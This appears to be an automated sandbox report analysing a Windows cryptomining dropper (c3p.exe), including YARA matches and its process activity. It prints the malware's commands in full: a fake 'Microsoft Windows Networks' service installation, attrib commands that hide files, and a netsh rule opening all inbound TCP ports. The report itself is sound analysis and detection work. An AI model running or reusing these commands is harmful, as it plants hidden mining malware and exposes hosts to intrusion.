                Source: C:\Users\user\Desktop\c3p.exeFile created: C:\Windows\debug\c3p\WinRing0x64.sysJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeFile deleted: C:\Windows\debug\c3p\__tmp_rar_sfx_access_check_6055437Jump to behavior
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004178F62_2_004178F6
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00401CC52_2_00401CC5
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041B8592_2_0041B859
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040C8162_2_0040C816
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041B02D2_2_0041B02D
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004278C42_2_004278C4
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041F0942_2_0041F094
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004140B22_2_004140B2
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004049422_2_00404942
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004159352_2_00415935
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004141CE2_2_004141CE
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040C1F22_2_0040C1F2
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004102EA2_2_004102EA
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00413A862_2_00413A86
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004273802_2_00427380
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040C4492_2_0040C449
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041AC592_2_0041AC59
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041B4392_2_0041B439
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004144E92_2_004144E9
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0040FD6E2_2_0040FD6E
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004055AD2_2_004055AD
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00428E012_2_00428E01
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00426E3C2_2_00426E3C
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00402EE82_2_00402EE8
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004167C92_2_004167C9
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_0041A7842_2_0041A784
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00427FBC2_2_00427FBC
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_004195225_2_00419522
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_004195229_2_00419522
                Source: Joe Sandbox ViewDropped File: C:\Windows\debug\c3p\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: C:\Users\user\Desktop\c3p.exeCode function: String function: 0041A05C appears 37 times
                Source: C:\Users\user\Desktop\c3p.exeCode function: String function: 0041A670 appears 47 times
                Source: C:\Users\user\Desktop\c3p.exeCode function: String function: 0041F65C appears 38 times
                Source: C:\Windows\debug\c3p\svchost.exeCode function: String function: 00416A78 appears 62 times
                Source: C:\Windows\debug\c3p\svchost.exeCode function: String function: 0041257C appears 74 times
                Source: C:\Windows\debug\c3p\svchost.exeCode function: String function: 00405400 appears 58 times
                Source: C:\Windows\debug\c3p\svchost.exeCode function: String function: 004097B0 appears 36 times
                Source: C:\Windows\debug\c3p\svchost.exeCode function: String function: 004144F2 appears 38 times
                Source: systems.exe.2.drStatic PE information: Number of sections : 11 > 10
                Source: c3p.exe, 00000002.00000003.1341556755.00000000026A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs c3p.exe
                Source: c3p.exe, 00000002.00000003.1341556755.0000000002A33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexmrig.exe, vs c3p.exe
                Source: c3p.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 15.0.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 15.2.systems.exe.7ff706b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 0000000F.00000000.1358706937.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 0000000F.00000000.1357815445.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                Source: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                Source: Process Memory Space: c3p.exe PID: 4912, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: Process Memory Space: systems.exe PID: 7504, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: C:\Windows\debug\c3p\systems.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: WinRing0x64.sys.2.drBinary string: \Device\WinRing0_1_2_0
                Source: classification engineClassification label: mal100.evad.mine.winEXE@27/7@5/3
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_004064B1 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_004064B1
                Source: C:\Windows\debug\c3p\svchost.exeCode function: GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,5_2_0040FA10
                Source: C:\Windows\debug\c3p\svchost.exeCode function: GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,9_2_0040FA10
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_0040A1E0 CreateToolhelp32Snapshot,GetLastError,Thread32First,GetLastError,CloseHandle,PostThreadMessageW,PostThreadMessageW,Thread32Next,PostThreadMessageW,Thread32Next,GetLastError,GetLastError,GetLastError,CloseHandle,5_2_0040A1E0
                Source: C:\Users\user\Desktop\c3p.exeCode function: 2_2_00419A1E SendMessageW,GetObjectW,CoCreateInstance,_memset,CreateDIBSection,DeleteObject,2_2_00419A1E
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00405600 GetUserDefaultLangID,FindResourceExW,FindResourceExW,GetLastError,FindResourceExW,LoadResource,CreateDialogIndirectParamW,5_2_00405600
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_0040EC60 __snwprintf_s,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError,5_2_0040EC60
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 5_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,5_2_00409B70
                Source: C:\Windows\debug\c3p\svchost.exeCode function: 9_2_00409B70 __fileno,__setmode,__fileno,__setmode,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,9_2_00409B70
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7460:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                Source: C:\Users\user\Desktop\c3p.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "
                Source: c3p.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\c3p.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: c3p.exeReversingLabs: Detection: 68%
                Source: systems.exeString found in binary or memory: -h, --help display this help and exit
                Source: systems.exeString found in binary or memory: -h, --help display this help and exit
                Source: systems.exeString found in binary or memory: rget,jit_inst,jit_prefetch_vgpr_index,jit_vmcnt,batch_size); if(p-start_p>size_limit) { *(p++)=S_SETPC_B64_S12_13; return p; } } while (!done); } *(p++)=S_SETPC_B64_S12_13; return p; } __attribute__((reqd_work_group_size(64,1,1))) __kernel void randomx_jit(_
                Source: systems.exeString found in binary or memory: --help
                Source: systems.exeString found in binary or memory: --help
                Source: C:\Users\user\Desktop\c3p.exeFile read: C:\Users\user\Desktop\c3p.exeJump to behavior
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                Source: unknownProcess created: C:\Users\user\Desktop\c3p.exe "C:\Users\user\Desktop\c3p.exe"
                Source: C:\Users\user\Desktop\c3p.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"
                Source: unknownProcess created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +a
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +r
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +r
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
                Source: C:\Windows\debug\c3p\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\debug\c3p\svchost.exeProcess created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\c3p.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\debug\c3p\cmd.bat" "Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\debug\c3p\svchost.exe C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "Networks2" DisplayName= "Networksrs2"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc description "Networks2" "Microsoft Windows Networks"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start "Networks2"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p +h +aJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.json +h +a +s +rJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib C:\Windows\debug\c3p\*.exe +h +a +s +rJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allowJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeProcess created: C:\Windows\debug\c3p\systems.exe "C:\WINDOWS\Debug\c3p\systems.exe" Jump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: riched32.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\c3p.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\sc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\debug\c3p\svchost.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
